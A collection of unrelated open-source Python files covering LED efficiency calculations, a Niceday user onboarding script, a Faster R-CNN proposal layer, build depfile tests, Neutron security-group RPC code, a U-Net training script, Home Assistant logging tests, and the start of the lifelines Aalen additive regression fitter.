# Integral3 = np.sum(perp_intensity * photopic_response["photopic_response"].to_numpy())
self.integral_3 = np.sum(
perpendicular_spectrum["intensity"].to_numpy()
* photopic_response.to_numpy()
)
# Integral4 = np.sum(perp_intensity * pd_responsivity["pd_responsivity"].to_numpy())
self.integral_4 = np.sum(
perpendicular_spectrum["intensity"] * pd_responsivity.to_numpy()
)
# Calculating CIE coordinates
def calculate_cie_coordinates(self, perpendicular_spectrum, cie_reference):
"""
Calculates wavelength of maximum spectral intensity and the CIE color coordinates
"""
# max_intensity_wavelength = perpendicular_spectrum.loc[
# perpendicular_spectrum.intensity == perpendicular_spectrum.intensity.max(),
# "wavelength",
# ].to_list()[0]
X = sum(perpendicular_spectrum.intensity * cie_reference.x_cie)
Y = sum(perpendicular_spectrum.intensity * cie_reference.y_cie)
Z = sum(perpendicular_spectrum.intensity * cie_reference.z_cie)
CIE = np.array([X / (X + Y + Z), Y / (X + Y + Z)])
return CIE
def calculate_non_lambertian_e_coeff(self):
"""
Calculate e_coeff
"""
return self.pd_voltage_cutoff / self.pd_resistance / self.sqsinalpha * 2
def calculate_non_lambertian_v_coeff(self):
"""
Calculate v_coeff
"""
return (
sc.physical_constants["luminous efficacy"][0]
* self.pd_voltage_cutoff
/ self.pd_resistance
/ self.sqsinalpha
* 2
)
def calculate_non_lambertian_eqe(self, e_coeff, e_correction_factor):
"""
Function to calculate the eqe
"""
# e_coeff = self.calculate_non_lambertian_e_coeff(jvl_data)
return np.divide(
100 * sc.e * e_coeff * self.integral_1 * e_correction_factor,
1e9 * sc.h * sc.c * self.current * self.integral_4,
out=np.zeros_like(
100 * sc.e * e_coeff * self.integral_1 * e_correction_factor
),
where=1e9 * sc.h * sc.c * self.current * self.integral_4 != 0,
)
# eqe = 100 * (
# sc.e
# / 1e9
# / sc.h
# / sc.c
# / self.current
# * e_coeff
# * self.integral_1
# / self.integral_4
# * e_correction_factor
# )
# return eqe
def calculate_non_lambertian_luminance(self, v_coeff):
"""
Calculate luminance
"""
# v_coeff = self.calculate_non_lambertian_v_coeff(jvl_data)
return (
1
/ np.pi
/ self.pixel_area
* v_coeff
/ 2
* self.integral_3
/ self.integral_4
)
def calculate_non_lambertian_luminous_efficacy(self, v_coeff, v_correction_factor):
"""
Calculate luminous efficiency
"""
# v_coeff = self.calculate_non_lambertian_v_coeff(jvl_data)
return np.divide(
v_coeff * self.integral_3 * v_correction_factor,
self.voltage * self.current * self.integral_4,
out=np.zeros_like(v_coeff * self.integral_3 * v_correction_factor),
where=self.voltage * self.current * self.integral_4 != 0,
)
def calculate_current_efficiency(self):
"""
Calculate current efficiency
"""
# In case of the current being zero, set a helper current to nan so
# that the result of the division becomes nan instead of infinite
return np.divide(
self.pixel_area * self.luminance,
self.current,
out=np.zeros_like(self.pixel_area * self.luminance),
where=self.current != 0,
)
# b = self.pixel_area / self.current * self.luminance
def calculate_non_lambertian_power_density(self, e_coeff, e_correction_factor):
"""
Calculate power density
"""
# e_coeff = self.calculate_non_lambertian_e_coeff(jvl_data)
return (
1
/ (self.pixel_area * 1e6)
* e_coeff
* self.integral_2
/ self.integral_4
* e_correction_factor
* 1e3
)
def calculate_lambertian_e_coeff(self):
"""
Calculate e_coeff
"""
return self.pd_voltage_cutoff / self.pd_resistance / self.sqsinalpha
def calculate_lambertian_v_coeff(self):
"""
Calculate v_coeff
"""
return (
sc.physical_constants["luminous efficacy"][0]
* self.pd_voltage_cutoff
/ self.pd_resistance
/ self.sqsinalpha
)
def calculate_lambertian_eqe(self, e_coeff):
"""
Function to calculate the eqe
"""
# e_coeff = calculate_lambertian_eqe(jvl_data)
return np.divide(
100 * sc.e * e_coeff * self.integral_1,
1e9 * sc.h * sc.c * self.current * self.integral_4,
out=np.zeros_like(100 * sc.e * e_coeff * self.integral_1),
where=1e9 * sc.h * sc.c * self.current * self.integral_4 != 0,
)
# return 100 * (
# sc.e
# / 1e9
# / sc.h
# / sc.c
# / self.current
# * e_coeff
# * self.integral_1
# / self.integral_4
# )
def calculate_lambertian_luminance(self, v_coeff):
"""
Calculate luminance
"""
# v_coeff = calculate_lambertian_v_coeff(jvl_data)
return np.divide(
1 * v_coeff * self.integral_3,
np.pi * self.pixel_area * self.integral_4,
out=np.zeros_like(1 * v_coeff * self.integral_3),
where=np.pi * self.pixel_area * self.integral_4 != 0,
)
# return 1 / np.pi / self.pixel_area * v_coeff * self.integral_3 / self.integral_4
def calculate_lambertian_luminous_efficacy(self, v_coeff):
"""
Calculate luminous efficiency
"""
# v_coeff = calculate_lambertian_v_coeff(self, jvl_data)
return np.divide(
1 * v_coeff * self.integral_3,
self.voltage * self.current * self.integral_4,
out=np.zeros_like(1 * v_coeff * self.integral_3),
where=self.voltage * self.current * self.integral_4 != 0,
)
# return (
# 1 / self.voltage / self.current * v_coeff * self.integral_3 / self.integral_4
# )
def calculate_lambertian_power_density(self, e_coeff):
"""
Calculate power density
"""
# e_coeff = calculate_lambertian_e_coeff(jvl_data)
return (
1
/ (self.pixel_area * 1e6)
* e_coeff
* self.integral_2
/ self.integral_4
* 1e3
)
def to_series(self):
"""
return the variables of the class as dataframe
"""
df = pd.Series()
df["voltage"] = self.voltage
df["pd_voltage"] = self.pd_voltage
df["current"] = self.current
df["current_density"] = self.current_density
df["absolute_current_density"] = self.absolute_current_density
df["cie"] = self.cie_coordinates
df["luminance"] = self.luminance
df["eqe"] = self.eqe
df["luminous_efficacy"] = self.luminous_efficacy
df["current_efficiency"] = self.current_efficiency
df["power_density"] = self.power_density
return df
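# ---------------------------------------------------------------------------
# Usage sketch (illustrative addition, not part of the original module): rough
# outline of how the helpers above fit together for a single pixel. All file
# paths, the column layout of the input CSV files and the photodiode geometry
# below are assumptions for demonstration only; the calibration files are
# assumed to share a common wavelength axis.
if __name__ == "__main__":
    photopic, pd_resp, cie_ref, spec_cal = read_calibration_files(
        "library/Photopic_response.txt",
        "library/Responsivity_PD.txt",
        "library/NormCurves_400-800.txt",
        "library/CalibrationData.txt",
    )
    # assumed columns: wavelength, background, intensity
    raw_spectrum = pd.read_csv("data/spectrum.csv")
    spectrum = interpolate_spectrum(
        calibrate_spectrum(raw_spectrum, spec_cal), photopic
    )
    # assumed columns: voltage, pd_voltage, current (current in mA)
    jvl = pd.read_csv("data/jvl.csv")
    result = JVLData(
        jvl,
        spectrum,
        photopic,
        pd_resp,
        cie_ref,
        angle_resolved=False,
        pixel_area=4e-6,      # m^2, assumed pixel size
        pd_resistance=4.7e5,  # ohm, assumed amplifier resistance
        pd_radius=0.003,      # m
        pd_distance=0.115,    # m
        pd_cutoff=3e-6,       # V, assumed photodiode noise floor
    )
    print(result.to_series())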
|
the-stack_106_23310 | import argparse
import sys
from virtual_coach_db.dbschema.models import Users
from virtual_coach_db.helper.helper import get_db_session
from niceday_client import NicedayClient, TrackerStatus
from niceday_client.definitions import Tracker
def enable_custom_trackers(userid: int):
"""
Enable custom trackers for user. We enable:
- 'tracker_smoking', trackerId=Tracker.SMOKING
See https://github.com/senseobservationsystems/goalie-js/issues/840 on how to get a
trackerId for a certain custom tracker.
Args:
userid: ID of the user you want to set tracker status for
"""
print('Enabling custom trackers')
client = NicedayClient()
client.set_user_tracker_statuses(
userid,
[TrackerStatus(trackerId=Tracker.SMOKING, isEnabled=True)])
def onboard_user(userid):
client = NicedayClient()
enable_custom_trackers(userid)
print(f'Fetching niceday profile for user {userid}')
profile = client.get_profile(userid)
print('Profile:', profile)
# Open session with db
session = get_db_session()
# Check if this user already exists in the table
# (assumes niceday user id is unique and immutable)
existing_users = (session.query(Users).
filter(Users.nicedayuid == userid).
count())
if existing_users != 0:
sys.exit(f'User {userid} already exists in the database.')
# Add new user to the Users table
new_user = Users(
nicedayuid=userid,
firstname=profile['firstName'],
lastname=profile['lastName'],
location=profile['location'],
gender=profile['gender'],
dob=profile['birthDate']
)
session.add(new_user)
session.commit()
print(f'Added new user profile (niceday uid {userid}) to db')
def main():
parser = argparse.ArgumentParser(description="Onboard the user with the given ID")
parser.add_argument("userid", type=int, help="User ID on Sensehealth server")
args = parser.parse_args()
onboard_user(args.userid)
if __name__ == "__main__":
main()
|
the-stack_106_23311 | # --------------------------------------------------------
# Faster R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick and Sean Bell
# --------------------------------------------------------
# --------------------------------------------------------
# Reorganized and modified by Jianwei Yang and Jiasen Lu
# --------------------------------------------------------
import torch
import torch.nn as nn
import numpy as np
import math
import yaml
from model.utils.config import cfg
from .generate_anchors import generate_anchors, generate_anchors_all_pyramids
from .bbox_transform import bbox_transform_inv, clip_boxes, clip_boxes_batch
#from model.nms.nms_wrapper import nms
from model.roi_layers import nms
import pdb
DEBUG = False
class _ProposalLayer_FPN(nn.Module):
"""
Outputs object detection proposals by applying estimated bounding-box
transformations to a set of regular boxes (called "anchors").
"""
def __init__(self, feat_stride, scales, ratios):
super(_ProposalLayer_FPN, self).__init__()
self._anchor_ratios = ratios
self._feat_stride = feat_stride
self._fpn_scales = np.array(cfg.FPN_ANCHOR_SCALES)
self._fpn_feature_strides = np.array(cfg.FPN_FEAT_STRIDES)
self._fpn_anchor_stride = cfg.FPN_ANCHOR_STRIDE
# self._anchors = torch.from_numpy(generate_anchors_all_pyramids(self._fpn_scales, ratios, self._fpn_feature_strides, fpn_anchor_stride))
# self._num_anchors = self._anchors.size(0)
def forward(self, input):
# Algorithm:
#
# for each (H, W) location i
# generate A anchor boxes centered on cell i
# apply predicted bbox deltas at cell i to each of the A anchors
# clip predicted boxes to image
# remove predicted boxes with either height or width < threshold
# sort all (proposal, score) pairs by score from highest to lowest
# take top pre_nms_topN proposals before NMS
# apply NMS with threshold 0.7 to remaining proposals
# take after_nms_topN proposals after NMS
# return the top proposals (-> RoIs top, scores top)
# the first set of _num_anchors channels are bg probs
# the second set are the fg probs
scores = input[0][:, :, 1] # batch_size x num_rois x 1
bbox_deltas = input[1] # batch_size x num_rois x 4
im_info = input[2]
cfg_key = input[3]
feat_shapes = input[4]
pre_nms_topN = cfg[cfg_key].RPN_PRE_NMS_TOP_N
post_nms_topN = cfg[cfg_key].RPN_POST_NMS_TOP_N
nms_thresh = cfg[cfg_key].RPN_NMS_THRESH
min_size = cfg[cfg_key].RPN_MIN_SIZE
batch_size = bbox_deltas.size(0)
anchors = torch.from_numpy(generate_anchors_all_pyramids(self._fpn_scales, self._anchor_ratios,
feat_shapes, self._fpn_feature_strides, self._fpn_anchor_stride)).type_as(scores)
num_anchors = anchors.size(0)
anchors = anchors.view(1, num_anchors, 4).expand(batch_size, num_anchors, 4)
# Convert anchors into proposals via bbox transformations
proposals = bbox_transform_inv(anchors, bbox_deltas, batch_size)
# 2. clip predicted boxes to image
proposals = clip_boxes(proposals, im_info, batch_size)
# keep_idx = self._filter_boxes(proposals, min_size).squeeze().long().nonzero().squeeze()
scores_keep = scores
proposals_keep = proposals
_, order = torch.sort(scores_keep, 1, True)
output = scores.new(batch_size, post_nms_topN, 5).zero_()
for i in range(batch_size):
# # 3. remove predicted boxes with either height or width < threshold
# # (NOTE: convert min_size to input image scale stored in im_info[2])
proposals_single = proposals_keep[i]
scores_single = scores_keep[i]
# # 4. sort all (proposal, score) pairs by score from highest to lowest
# # 5. take top pre_nms_topN (e.g. 6000)
order_single = order[i]
if pre_nms_topN > 0 and pre_nms_topN < scores_keep.numel():
order_single = order_single[:pre_nms_topN]
proposals_single = proposals_single[order_single, :]
scores_single = scores_single[order_single].view(-1,1)
# 6. apply nms (e.g. threshold = 0.7)
# 7. take after_nms_topN (e.g. 300)
# 8. return the top proposals (-> RoIs top)
#keep_idx_i = nms(torch.cat((proposals_single, scores_single), 1), nms_thresh)
keep_idx_i = nms(proposals_single, scores_single.squeeze(1), nms_thresh)
keep_idx_i = keep_idx_i.long().view(-1)
if post_nms_topN > 0:
keep_idx_i = keep_idx_i[:post_nms_topN]
proposals_single = proposals_single[keep_idx_i, :]
scores_single = scores_single[keep_idx_i, :]
# padding 0 at the end.
num_proposal = proposals_single.size(0)
output[i,:,0] = i
output[i,:num_proposal,1:] = proposals_single
return output
def backward(self, top, propagate_down, bottom):
"""This layer does not propagate gradients."""
pass
def reshape(self, bottom, top):
"""Reshaping happens during the call to forward."""
pass
def _filter_boxes(self, boxes, min_size):
"""Remove all boxes with any side smaller than min_size."""
ws = boxes[:, :, 2] - boxes[:, :, 0] + 1
hs = boxes[:, :, 3] - boxes[:, :, 1] + 1
keep = ((ws >= min_size) & (hs >= min_size))
return keep
|
the-stack_106_23313 | #!/usr/bin/env python3.8
# Copyright 2021 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import unittest
import tempfile
from depfile import DepFile
class DepFileTests(unittest.TestCase):
"""Validate the depfile generation
This validates the rebasing behavior using the following imaginary set of
files::
/foo/
bar/
baz/
output
things/
input_a
input_b
input_c
Assume a CWD of /foo/bar
"""
expected = "baz/output: \\\n ../input_c \\\n things/input_a \\\n things/input_b\n"
def test_specified_cwd(self):
output = "/foo/bar/baz/output"
input_a = "/foo/bar/things/input_a"
input_b = "/foo/bar/things/input_b"
input_c = "/foo/input_c"
rebased_depfile = DepFile(output, rebase="/foo/bar")
rebased_depfile.add_input(input_a)
rebased_depfile.add_input(input_b)
rebased_depfile.update([input_b, input_c])
self.assertEqual(str(rebased_depfile), DepFileTests.expected)
def test_inferred_cwd(self):
"""Validate the standard behavior, with a mix of absolute and real paths."""
# make the output absolute (from a path relative to the cwd)
output = os.path.abspath("baz/output")
input_a = os.path.abspath("things/input_a")
input_b = "things/input_b"
input_c = os.path.abspath("../input_c")
depfile = DepFile(output)
depfile.update([input_a, input_b, input_c])
self.assertEqual(str(depfile), DepFileTests.expected)
def test_depfile_writing(self):
depfile = DepFile("/foo/bar/baz/output", rebase="/foo/bar")
depfile.update(
[
"/foo/bar/things/input_a", "/foo/bar/things/input_b",
"/foo/input_c"
])
with tempfile.TemporaryFile('w+') as outfile:
# Write out the depfile
depfile.write_to(outfile)
# Read the contents back in
outfile.seek(0)
contents = outfile.read()
self.assertEqual(contents, DepFileTests.expected)
if __name__ == '__main__':
unittest.main()
|
the-stack_106_23314 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2012, Nachi Ueno, NTT MCL, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from oslo.config import cfg
from neutron.common import topics
from neutron.openstack.common import importutils
from neutron.openstack.common import log as logging
LOG = logging.getLogger(__name__)
SG_RPC_VERSION = "1.1"
security_group_opts = [
cfg.StrOpt(
'firewall_driver',
default='neutron.agent.firewall.NoopFirewallDriver',
help=_('Driver for Security Groups Firewall'))
]
cfg.CONF.register_opts(security_group_opts, 'SECURITYGROUP')
def is_firewall_enabled():
return (cfg.CONF.SECURITYGROUP.firewall_driver !=
'neutron.agent.firewall.NoopFirewallDriver')
def disable_security_group_extension_if_noop_driver(
supported_extension_aliases):
if not is_firewall_enabled():
LOG.debug(_('Disabled security-group extension.'))
supported_extension_aliases.remove('security-group')
class SecurityGroupServerRpcApiMixin(object):
"""A mix-in that enable SecurityGroup support in plugin rpc."""
def security_group_rules_for_devices(self, context, devices):
LOG.debug(_("Get security group rules "
"for devices via rpc %r"), devices)
return self.call(context,
self.make_msg('security_group_rules_for_devices',
devices=devices),
version=SG_RPC_VERSION,
topic=self.topic)
class SecurityGroupAgentRpcCallbackMixin(object):
"""A mix-in that enable SecurityGroup agent
support in agent implementations.
"""
#mix-in object should be have sg_agent
sg_agent = None
def security_groups_rule_updated(self, context, **kwargs):
"""Callback for security group rule update.
:param security_groups: list of updated security_groups
"""
security_groups = kwargs.get('security_groups', [])
LOG.debug(
_("Security group rule updated on remote: %s"), security_groups)
self.sg_agent.security_groups_rule_updated(security_groups)
def security_groups_member_updated(self, context, **kwargs):
"""Callback for security group member update.
:param security_groups: list of updated security_groups
"""
security_groups = kwargs.get('security_groups', [])
LOG.debug(
_("Security group member updated on remote: %s"), security_groups)
self.sg_agent.security_groups_member_updated(security_groups)
def security_groups_provider_updated(self, context, **kwargs):
"""Callback for security group provider update."""
LOG.debug(_("Provider rule updated"))
self.sg_agent.security_groups_provider_updated()
class SecurityGroupAgentRpcMixin(object):
"""A mix-in that enable SecurityGroup agent
support in agent implementations.
"""
def init_firewall(self):
firewall_driver = cfg.CONF.SECURITYGROUP.firewall_driver
LOG.debug(_("Init firewall settings (driver=%s)"), firewall_driver)
self.firewall = importutils.import_object(firewall_driver)
def prepare_devices_filter(self, device_ids):
if not device_ids:
return
LOG.info(_("Preparing filters for devices %s"), device_ids)
devices = self.plugin_rpc.security_group_rules_for_devices(
self.context, list(device_ids))
with self.firewall.defer_apply():
for device in devices.values():
self.firewall.prepare_port_filter(device)
def security_groups_rule_updated(self, security_groups):
LOG.info(_("Security group "
"rule updated %r"), security_groups)
self._security_group_updated(
security_groups,
'security_groups')
def security_groups_member_updated(self, security_groups):
LOG.info(_("Security group "
"member updated %r"), security_groups)
self._security_group_updated(
security_groups,
'security_group_source_groups')
def _security_group_updated(self, security_groups, attribute):
devices = []
sec_grp_set = set(security_groups)
for device in self.firewall.ports.values():
if sec_grp_set & set(device.get(attribute, [])):
devices.append(device)
if devices:
self.refresh_firewall(devices)
def security_groups_provider_updated(self):
LOG.info(_("Provider rule updated"))
self.refresh_firewall()
def remove_devices_filter(self, device_ids):
if not device_ids:
return
LOG.info(_("Remove device filter for %r"), device_ids)
with self.firewall.defer_apply():
for device_id in device_ids:
device = self.firewall.ports.get(device_id)
if not device:
continue
self.firewall.remove_port_filter(device)
def refresh_firewall(self, devices=None):
LOG.info(_("Refresh firewall rules"))
if devices:
device_ids = [d['device'] for d in devices]
else:
device_ids = self.firewall.ports.keys()
if not device_ids:
LOG.info(_("No ports here to refresh firewall"))
return
devices = self.plugin_rpc.security_group_rules_for_devices(
self.context, device_ids)
with self.firewall.defer_apply():
for device in devices.values():
LOG.debug(_("Update port filter for %s"), device['device'])
self.firewall.update_port_filter(device)
class SecurityGroupAgentRpcApiMixin(object):
def _get_security_group_topic(self):
return topics.get_topic_name(self.topic,
topics.SECURITY_GROUP,
topics.UPDATE)
def security_groups_rule_updated(self, context, security_groups):
"""Notify rule updated security groups."""
if not security_groups:
return
self.fanout_cast(context,
self.make_msg('security_groups_rule_updated',
security_groups=security_groups),
version=SG_RPC_VERSION,
topic=self._get_security_group_topic())
def security_groups_member_updated(self, context, security_groups):
"""Notify member updated security groups."""
if not security_groups:
return
self.fanout_cast(context,
self.make_msg('security_groups_member_updated',
security_groups=security_groups),
version=SG_RPC_VERSION,
topic=self._get_security_group_topic())
def security_groups_provider_updated(self, context):
"""Notify provider updated security groups."""
self.fanout_cast(context,
self.make_msg('security_groups_provider_updated'),
version=SG_RPC_VERSION,
topic=self._get_security_group_topic())
|
the-stack_106_23315 | import matplotlib as mpl
mpl.use('agg')
import sys
import glob
import numpy as np
import argparse
from time import time
import tensorflow as tf
from os.path import isfile
sys.path.insert(0,'../../unet/tf_unet')
import pylab as plt
from sklearn.metrics import matthews_corrcoef
from mydataprovider import UnetDataProvider as DataProvider
from tf_unet import unet
from tf_unet import util
#from IPython.display import clear_output
from utils import *
parser = argparse.ArgumentParser()
parser.add_argument('--layers', required=False, help='number of layers', type=int, default=3)
parser.add_argument('--feat', required=False, help='choose architecture', type=int, default=32)
parser.add_argument('--ws', required=False, help='time window', type=int, default=400)
parser.add_argument('--nqq', required=False, help='number of Q', type=int, default=1)
#parser.add_argument('--train', action="store_true", default=False)
parser.add_argument('--test', action="store_true", default=False)
parser.add_argument('--ntry', required=True, help='choose architecture', type=str)
args = parser.parse_args()
layers = args.layers
features_root = args.feat
ws = args.ws
nqq = args.nqq
ntry = args.ntry
files_list = sorted(glob.glob('../../data/hide/hide_sims_train/calib_1year/*.fits'))
#test_files = sorted(glob.glob('../../data/hide/hide_sims_test/calib_1month/*.fits'))
test_files = sorted(glob.glob('../../data/hide/hide_sims_valid/*.fits'))
#dpt = DataProvider(nx=ws,a_min=0, a_max=200, files=files_list)
if ntry=='1':
nnn = 5
elif ntry=='2':
nnn = 1
else:
print('WTF!')
exit()
threshold = nnn*0.6996
dpt = DataProvider(nx=ws,
files=files_list,
threshold=threshold,
sim='hide',
r_freq=300,
n_loaded=10,
a_min=0,
a_max=200,
n_class=2)
_,nx,ny,_ = dpt(1)[0].shape
training_iters = 20
epochs = 5
name = str(layers)+'_'+str(features_root)+'_'+str(nx)+'x'+str(ny)+'_try'+ntry
print(name)
model_dir = './models/hide_unet_'+name
pred_dir = 'predictions/hide_unet_'+name+'/'
ch_mkdir(pred_dir)
res_file = 'results/hide_unet_'+name
ch_mkdir('results')
qq0 = 0
if isfile(res_file+'_prop.npy'):
qq0 = np.load(res_file+'_prop.npy')
qq0 = int(qq0)
qq0 = qq0+1
print('The learning will begin from {} q number.'.format(qq0))
nqq = qq0+1
for qq in range(qq0,nqq):
print(qq)
restore = qq!=0
tf.reset_default_graph()
net = unet.Unet(channels=1,
n_class=2,
layers=layers,
features_root=features_root,
cost_kwargs=dict(regularizer=0.001))
if not restore:
print('')
n_variables = np.sum([np.prod(v.get_shape().as_list()) for v in tf.trainable_variables()])
print('Number of trainable variables: {:d}'.format(n_variables))
trainer = unet.Trainer(net, batch_size=10, optimizer="momentum", opt_kwargs=dict(momentum=0.2))
path = trainer.train(dpt, model_dir,
training_iters=training_iters,
epochs=epochs,
dropout=0.5,
display_step=1000000,
restore=restore,
prediction_path = 'prediction/'+name)
prop = np.array(qq)
np.save(res_file+'_prop',prop)
if args.test:
tf.reset_default_graph()
net = unet.Unet(channels=1,
n_class=2,
layers=layers,
features_root=features_root,
cost_kwargs=dict(regularizer=0.001))
trainer = unet.Trainer(net, batch_size=10, optimizer="momentum", opt_kwargs=dict(momentum=0.2))
path = trainer.train(dpt, model_dir,
training_iters=1,
epochs=1,
dropout=0.5,
display_step=1000000,
restore=True,
prediction_path = 'prediction/'+name)
pr_list = []
roc_list = []
auc_list = []
mcc_list = []
clrs = ['b','r','g','k']
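    # sweep 100 detection thresholds from 1 down to 0 for the precision-recall and ROC curves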
    trsh = np.linspace(1, 0, 100, endpoint=True)
for fil in test_files:
fname = fil.split('/')[-1]
# dp = DataProvider(nx=0,a_min=0, a_max=200, files=[fil])
dp = DataProvider(nx=0,
files=[fil],
threshold=threshold,
sim='hide',
r_freq=5,
n_loaded=1,
a_min=0,
a_max=200,
n_class=2)
data,mask = dp(1)
pred,dt = net.predict(model_dir+'/model.cpkt', data,time_it=1)
        _, kk, jj, _ = pred.shape
mask = util.crop_to_shape(mask, pred.shape)[:,:kk,:jj,:]
fig, (ax1,ax2,ax3) = plt.subplots(3,1,figsize=(18,8))
ax1.imshow(data[0,:,:,0],aspect='auto')
ax2.imshow(mask[0,:,:,1],aspect='auto')
ax3.imshow(pred[0,:,:,1],aspect='auto')
np.save(pred_dir+fname+'_mask',mask)
np.save(pred_dir+fname+'_pred',pred)
plt.subplots_adjust(left=0.04, right=0.99, top=0.99, bottom=0.04)
plt.savefig(pred_dir+fname+'.jpg',dpi=30)
plt.close()
y_true = mask[0,:,:,1].reshape(-1).astype(int)
y_score = pred[0,:,:,1].reshape(-1)
y_score /= y_score.max()
recall,precision = prc(y_true, y_score, trsh)
pr_list.append(np.stack([recall,precision]).T)
fpr,tpr = rocc(y_true, y_score, trsh)
roc_list.append(np.stack([fpr,tpr]).T)
auc_list.append(np.trapz(tpr, fpr))
mcc_list.append(matthews_corrcoef(y_true, y_score.round()))
np.save(res_file+'_pr',np.array(pr_list))
np.save(res_file+'_roc',np.array(roc_list))
np.save(res_file+'_mcc',np.array(mcc_list))
print(np.mean(auc_list),np.mean(mcc_list))
|
the-stack_106_23316 | """Test Home Assistant logging util methods."""
import asyncio
import logging
import queue
import pytest
import homeassistant.util.logging as logging_util
from tests.async_mock import patch
def test_sensitive_data_filter():
"""Test the logging sensitive data filter."""
log_filter = logging_util.HideSensitiveDataFilter("mock_sensitive")
clean_record = logging.makeLogRecord({"msg": "clean log data"})
log_filter.filter(clean_record)
assert clean_record.msg == "clean log data"
sensitive_record = logging.makeLogRecord({"msg": "mock_sensitive log"})
log_filter.filter(sensitive_record)
assert sensitive_record.msg == "******* log"
async def test_logging_with_queue_handler():
"""Test logging with HomeAssistantQueueHandler."""
simple_queue = queue.SimpleQueue() # type: ignore
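    # records emitted through the handler land on this queue; the test drains it at the end to confirm delivery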
handler = logging_util.HomeAssistantQueueHandler(simple_queue)
log_record = logging.makeLogRecord({"msg": "Test Log Record"})
handler.emit(log_record)
with pytest.raises(asyncio.CancelledError), patch.object(
handler, "enqueue", side_effect=asyncio.CancelledError
):
handler.emit(log_record)
with patch.object(handler, "emit") as emit_mock:
handler.handle(log_record)
emit_mock.assert_called_once()
with patch.object(handler, "filter") as filter_mock, patch.object(
handler, "emit"
) as emit_mock:
filter_mock.return_value = False
handler.handle(log_record)
emit_mock.assert_not_called()
with patch.object(handler, "enqueue", side_effect=OSError), patch.object(
handler, "handleError"
) as mock_handle_error:
handler.emit(log_record)
mock_handle_error.assert_called_once()
handler.close()
assert simple_queue.get_nowait().msg == "Test Log Record"
assert simple_queue.empty()
async def test_migrate_log_handler(hass):
"""Test migrating log handlers."""
logging_util.async_activate_log_queue_handler(hass)
assert len(logging.root.handlers) == 1
assert isinstance(logging.root.handlers[0], logging_util.HomeAssistantQueueHandler)
@pytest.mark.no_fail_on_log_exception
async def test_async_create_catching_coro(hass, caplog):
"""Test exception logging of wrapped coroutine."""
async def job():
raise Exception("This is a bad coroutine")
hass.async_create_task(logging_util.async_create_catching_coro(job()))
await hass.async_block_till_done()
assert "This is a bad coroutine" in caplog.text
assert "in test_async_create_catching_coro" in caplog.text
|
the-stack_106_23318 | # -*- coding: utf-8 -*-
import warnings
from datetime import datetime
import time
import numpy as np
import pandas as pd
from numpy.linalg import LinAlgError
from scipy.integrate import trapz
from lifelines.fitters import BaseFitter
from lifelines.utils import (
_get_index,
inv_normal_cdf,
epanechnikov_kernel,
ridge_regression as lr,
qth_survival_times,
check_for_numeric_dtypes_or_raise,
concordance_index,
check_nans_or_infs,
ConvergenceWarning,
normalize,
string_justify,
_to_list,
format_floats,
format_p_value,
format_exp_floats,
survival_table_from_events,
StatisticalWarning,
CensoringType,
)
from lifelines.plotting import set_kwargs_ax
class AalenAdditiveFitter(BaseFitter):
r"""
This class fits the regression model:
.. math:: h(t|x) = b_0(t) + b_1(t) x_1 + ... + b_N(t) x_N
that is, the hazard rate is a linear function of the covariates with time-varying coefficients.
This implementation assumes non-time-varying covariates, see ``TODO: name``
Note
-----
This class was rewritten in lifelines 0.17.0 to focus solely on static datasets.
There is no guarantee of backwards compatibility.
Parameters
-----------
fit_intercept: bool, optional (default: True)
If False, do not attach an intercept (column of ones) to the covariate matrix. The
intercept, :math:`b_0(t)` acts as a baseline hazard.
alpha: float, optional (default=0.05)
the level in the confidence intervals.
coef_penalizer: float, optional (default: 0)
Attach a L2 penalizer to the size of the coefficients during regression. This improves
stability of the estimates and controls for high correlation between covariates.
For example, this shrinks the absolute value of :math:`c_{i,t}`.
smoothing_penalizer: float, optional (default: 0)
Attach a L2 penalizer to difference between adjacent (over time) coefficients. For
example, this shrinks the absolute value of :math:`c_{i,t} - c_{i,t+1}`.
Attributes
----------
cumulative_hazards_ : DataFrame
The estimated cumulative hazard
hazards_ : DataFrame
The estimated hazards
confidence_intervals_ : DataFrame
The lower and upper confidence intervals for the cumulative hazard
durations: array
The durations provided
event_observed: array
The event_observed variable provided
weights: array
The event_observed variable provided
"""
def __init__(self, fit_intercept=True, alpha=0.05, coef_penalizer=0.0, smoothing_penalizer=0.0):
super(AalenAdditiveFitter, self).__init__(alpha=alpha)
self.fit_intercept = fit_intercept
self.alpha = alpha
self.coef_penalizer = coef_penalizer
self.smoothing_penalizer = smoothing_penalizer
if not (0 < alpha <= 1.0):
raise ValueError("alpha parameter must be between 0 and 1.")
if coef_penalizer < 0 or smoothing_penalizer < 0:
raise ValueError("penalizer parameters must be >= 0.")
@CensoringType.right_censoring
def fit(self, df, duration_col, event_col=None, weights_col=None, show_progress=False):
"""
Parameters
----------
Fit the Aalen Additive model to a dataset.
Parameters
----------
df: DataFrame
a Pandas DataFrame with necessary columns `duration_col` and
`event_col` (see below), covariates columns, and special columns (weights).
`duration_col` refers to
the lifetimes of the subjects. `event_col` refers to whether
the 'death' events was observed: 1 if observed, 0 else (censored).
duration_col: string
the name of the column in DataFrame that contains the subjects'
lifetimes.
event_col: string, optional
the name of the column in DataFrame that contains the subjects' death
observation. If left as None, assume all individuals are uncensored.
weights_col: string, optional
an optional column in the DataFrame, df, that denotes the weight per subject.
This column is expelled and not used as a covariate, but as a weight in the
final regression. Default weight is 1.
This can be used for case-weights. For example, a weight of 2 means there were two subjects with
identical observations.
This can be used for sampling weights.
show_progress: boolean, optional (default=False)
Since the fitter is iterative, show iteration number.
Returns
-------
self: AalenAdditiveFitter
self with additional new properties: ``cumulative_hazards_``, etc.
Examples
--------
>>> from lifelines import AalenAdditiveFitter
>>>
>>> df = pd.DataFrame({
>>> 'T': [5, 3, 9, 8, 7, 4, 4, 3, 2, 5, 6, 7],
>>> 'E': [1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 0],
>>> 'var': [0, 0, 0, 0, 1, 1, 1, 1, 1, 2, 2, 2],
